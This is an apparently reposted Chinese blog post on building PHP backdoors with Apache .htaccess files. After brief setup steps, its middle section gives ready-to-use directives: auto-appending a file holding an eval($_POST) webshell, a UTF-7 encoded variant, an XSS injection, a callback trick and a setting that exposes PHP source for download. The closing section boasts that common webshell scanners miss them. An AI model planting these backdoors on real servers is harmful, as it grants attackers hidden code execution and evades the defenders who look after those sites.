利用.htaccess文件构成的PHP后门
程序员文章站
2022-04-02 12:23:56
0x00 .htaccess简介
.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用...
0x00 .htaccess简介
.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。
平时开发用的最多的就是URL重定向功能。
0x01 开启.htaccess
Apache中修改配置文件httpd.conf
1、修改如下内容
Options FollowSymLinks
AllowOverride None
为:
Options FollowSymLinks
AllowOverride All
2、开启rewrite模块
LoadModule rewrite_module modules/mod_rewrite.so
0x02 后门篇
1、 文件包含
.htaccess: php_value auto_append_file D:/wamp/www/1.txt *.php
2、 XSS后门
.htaccess: php_value highlight.comment '"><script>alert(1);</script>' *.php
3、 PHP后门
.htaccess: php_value auto_append_file .htaccess #<?php eval($_POST[1]); *.php .htaccess: php_flag zend.multibyte 1 php_value zend.script_encoding "UTF-7" php_value auto_append_file .htaccess #+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads *.php .htaccess: php_value unserialize_callback_func "phpinfo" index.php: unserialize('O:1:"1":0:{}');
类似的回调函数都是可以的,过此处phpinfo要怎么调用才能运行任意代码还没研究出来。
4、 任意文件下载
.htaccess: php_flag engine 0 *.php
0x03 webshell查杀
目前使用了D盾webshell查杀、SeayFindShell等工具对这个都没有查杀效果。不过也都是一些简单的一句话木马了,很容易被入库干掉。自己写了一个伪装成mysql调试文件的PHP木马,感觉好用多了。